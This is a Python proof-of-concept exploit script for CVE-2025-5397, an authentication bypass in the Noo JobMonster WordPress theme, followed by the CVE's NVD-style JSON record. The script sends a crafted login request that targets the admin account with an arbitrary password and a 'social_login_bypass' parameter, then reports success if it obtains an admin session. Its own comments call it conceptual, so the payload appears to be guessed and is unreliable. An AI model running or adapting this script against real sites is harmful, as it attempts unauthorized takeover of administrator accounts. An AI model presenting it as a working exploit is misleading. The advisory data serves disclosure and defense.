CVE-2025-5397

import requests import re # CVE-2025-5397 PoC - Authentication Bypass in Noo JobMonster Theme # Target: WordPress site with Noo JobMonster theme (<=4.8.1) with social login enabled def exploit_auth_bypass(target_url): """ Exploit authentication bypass vulnerability in Noo JobMonster theme. This PoC demonstrates the authentication bypass via social login mechanism. """ # Step 1: Identify if target is using vulnerable Noo JobMonster theme theme_info_url = f"{target_url}/wp-content/themes/noo-jobmonster/" # Step 2: Target the social login authentication endpoint # The vulnerability exists in check_login() function auth_endpoint = f"{target_url}/wp-login.php" # Step 3: Craft authentication bypass request # Due to improper validation in check_login(), attacker can forge authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded' } # Exploit payload targeting the authentication bypass # The actual exploit may vary based on specific vulnerable endpoint exploit_data = { 'log': 'admin', # Target admin account 'pwd': 'any_password', # Can be arbitrary 'redirect_to': '/wp-admin/', 'social_login_bypass': '1' # Bypass parameter exploiting check_login() flaw } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting authentication bypass vulnerability...") # Send exploitation request try: response = requests.post(auth_endpoint, data=exploit_data, headers=headers, allow_redirects=False) if response.status_code in [302, 301]: location = response.headers.get('Location', '') if 'wp-admin' in location or response.cookies: print("[+] Authentication bypass successful!") print(f"[+] Admin session cookie obtained") return True print("[-] Exploitation failed or target not vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False # Note: This is a conceptual PoC. Actual exploitation requires specific conditions: # 1. Noo JobMonster theme <= 4.8.1 installed # 2. Social login feature enabled on target site # 3. Knowledge of target admin username if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] exploit_auth_bypass(target) else: print("Usage: python cve-2025-5397_poc.py <target_url>")

{"cve": {"id": "CVE-2025-5397", "sourceIdentifier": "[email protected]", "published": "2025-10-31T07:15:37.427", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Noo JobMonster theme for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 4.8.1. This is due to the check_login() function not properly verifying a user's identity prior to successfully authenticating them This makes it possible for unauthenticated attackers to bypass standard authentication and access administrative user accounts. Please note social login needs to be enabled in order for a site to be impacted by this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://themeforest.net/item/jobmonster-job-board-wordpress-theme/10965446", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fa4aa8d-d7f1-4e91-bb2c-c9f80a4bb216?source=cve", "source": "[email protected]"}]}}